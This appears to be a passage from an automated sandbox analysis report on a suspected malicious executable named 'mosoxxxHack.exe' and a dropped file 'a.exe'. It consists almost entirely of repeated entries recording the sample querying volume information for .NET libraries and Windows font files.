Source: C:\Users\user\Desktop\mosoxxxHack.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mosoxxxHack.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\a.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation	Jump to behavior
